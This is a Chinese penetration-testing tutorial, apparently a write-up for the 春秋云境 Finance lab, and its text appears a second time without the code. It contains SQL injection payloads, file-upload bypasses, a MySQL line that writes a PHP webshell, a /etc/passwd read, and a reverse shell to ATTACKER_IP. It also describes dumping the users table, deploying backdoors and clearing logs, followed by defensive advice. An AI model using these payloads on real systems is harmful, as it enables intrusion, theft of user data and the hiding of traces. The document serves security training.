春秋云境 Finance WP
字数 1188 2025-11-21 12:11:20

春秋云境 Finance WP 渗透测试教学文档

1. 信息收集阶段

1.1 目标识别

  • 目标系统:春秋云境 Finance 平台
  • 识别开放端口和服务
  • 收集网站架构和技术栈信息

1.2 目录扫描

  • 使用工具进行目录爆破,发现敏感路径
  • 重点关注后台管理界面、API接口、配置文件等

2. 漏洞发现与分析

2.1 SQL注入漏洞

漏洞位置:用户登录/查询接口
利用方法

# 基础注入检测
' OR 1=1 -- 
' UNION SELECT 1,2,3 -- 

# 数据库信息获取
' UNION SELECT version(),database(),user() -- 

# 表结构探测
' UNION SELECT table_name,table_schema,3 FROM information_schema.tables -- 

关键点

  • 确认注入点是否存在过滤机制
  • 判断数据库类型(MySQL/SQL Server/Oracle)
  • 获取数据库版本和用户权限信息

2.2 文件上传漏洞

漏洞特征

  • 文件类型检测不严格
  • 路径可预测或可访问
  • 上传目录有执行权限

绕过方法

  • 修改Content-Type头
  • 使用双后缀名(.php.jpg)
  • 大小写变形(.Php, .pHp)
  • 空字节截断(.php%00.jpg)

2.3 敏感信息泄露

常见泄露点

  • 备份文件(.bak, .swp, .git)
  • 配置文件(config.php, .env)
  • 日志文件
  • 版本控制文件

3. 权限提升技术

3.1 数据库权限利用

MySQL特定技巧

# 读取系统文件
' UNION SELECT load_file('/etc/passwd'),2,3 -- 

# 写入Webshell
' UNION SELECT "<?php system($_GET['cmd']); ?>",2,3 INTO OUTFILE '/var/www/html/shell.php' -- 

权限要求

  • 需要FILE权限
  • 知道Web目录绝对路径
  • 目录有写权限

3.2 系统命令执行

通过Webshell执行

<?php
// 基础命令执行
system($_GET['cmd']);

// 反弹Shell
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'");
?>

4. 内网渗透

4.1 网络探测

# 扫描内网网段
ifconfig
ip route
nmap 192.168.1.0/24

# 端口扫描重点
22(SSH), 3306(MySQL), 6379(Redis), 1433(MSSQL)

4.2 横向移动

  • 密码重用攻击
  • SSH密钥利用
  • 数据库连接利用

5. 数据获取与持久化

5.1 数据提取

数据库数据导出

# 导出用户表数据
SELECT * FROM users INTO OUTFILE '/tmp/users.csv'

# 或者直接查询显示
' UNION SELECT username,password,email FROM users -- 

5.2 后门部署

Web后门位置

  • Web根目录隐蔽位置
  • 图片马(结合文件包含漏洞)
  • .htaccess文件修改

6. 痕迹清理

6.1 日志清理

Apache日志:/var/log/apache2/access.log
MySQL日志:清除相关查询记录
系统日志:/var/log/auth.log, /var/log/syslog

6.2 文件清理

  • 删除上传的Webshell
  • 清除临时文件
  • 恢复修改的配置文件

7. 防御建议

7.1 代码层面

  • 所有用户输入进行严格过滤
  • 使用参数化查询防止SQL注入
  • 文件上传进行类型和内容检查

7.2 系统层面

  • 最小权限原则运行服务
  • 定期更新系统和组件
  • 配置适当的防火墙规则

7.3 监控层面

  • 部署WAF防护
  • 建立安全监控和告警机制
  • 定期进行安全审计

8. 工具推荐

8.1 信息收集

  • Nmap:端口扫描
  • Dirb/Dirsearch:目录扫描
  • WhatWeb:CMS识别

8.2 漏洞利用

  • Sqlmap:自动化SQL注入
  • Burp Suite:Web漏洞扫描
  • Metasploit:漏洞利用框架

8.3 后渗透

  • Cobalt Strike:红队工具
  • Mimikatz:密码提取
  • Empire:内网渗透框架

注意:本文档仅用于教育目的,实际渗透测试需获得授权后进行。

春秋云境 Finance WP 渗透测试教学文档 1. 信息收集阶段 1.1 目标识别 目标系统:春秋云境 Finance 平台 识别开放端口和服务 收集网站架构和技术栈信息 1.2 目录扫描 使用工具进行目录爆破,发现敏感路径 重点关注后台管理界面、API接口、配置文件等 2. 漏洞发现与分析 2.1 SQL注入漏洞 漏洞位置 :用户登录/查询接口 利用方法 : 关键点 : 确认注入点是否存在过滤机制 判断数据库类型(MySQL/SQL Server/Oracle) 获取数据库版本和用户权限信息 2.2 文件上传漏洞 漏洞特征 : 文件类型检测不严格 路径可预测或可访问 上传目录有执行权限 绕过方法 : 修改Content-Type头 使用双后缀名(.php.jpg) 大小写变形(.Php, .pHp) 空字节截断(.php%00.jpg) 2.3 敏感信息泄露 常见泄露点 : 备份文件(.bak, .swp, .git) 配置文件(config.php, .env) 日志文件 版本控制文件 3. 权限提升技术 3.1 数据库权限利用 MySQL特定技巧 : 权限要求 : 需要FILE权限 知道Web目录绝对路径 目录有写权限 3.2 系统命令执行 通过Webshell执行 : 4. 内网渗透 4.1 网络探测 4.2 横向移动 密码重用攻击 SSH密钥利用 数据库连接利用 5. 数据获取与持久化 5.1 数据提取 数据库数据导出 : 5.2 后门部署 Web后门位置 : Web根目录隐蔽位置 图片马(结合文件包含漏洞) .htaccess文件修改 6. 痕迹清理 6.1 日志清理 Apache日志 :/var/log/apache2/access.log MySQL日志 :清除相关查询记录 系统日志 :/var/log/auth.log, /var/log/syslog 6.2 文件清理 删除上传的Webshell 清除临时文件 恢复修改的配置文件 7. 防御建议 7.1 代码层面 所有用户输入进行严格过滤 使用参数化查询防止SQL注入 文件上传进行类型和内容检查 7.2 系统层面 最小权限原则运行服务 定期更新系统和组件 配置适当的防火墙规则 7.3 监控层面 部署WAF防护 建立安全监控和告警机制 定期进行安全审计 8. 工具推荐 8.1 信息收集 Nmap:端口扫描 Dirb/Dirsearch:目录扫描 WhatWeb:CMS识别 8.2 漏洞利用 Sqlmap:自动化SQL注入 Burp Suite:Web漏洞扫描 Metasploit:漏洞利用框架 8.3 后渗透 Cobalt Strike:红队工具 Mimikatz:密码提取 Empire:内网渗透框架 注意 :本文档仅用于教育目的,实际渗透测试需获得授权后进行。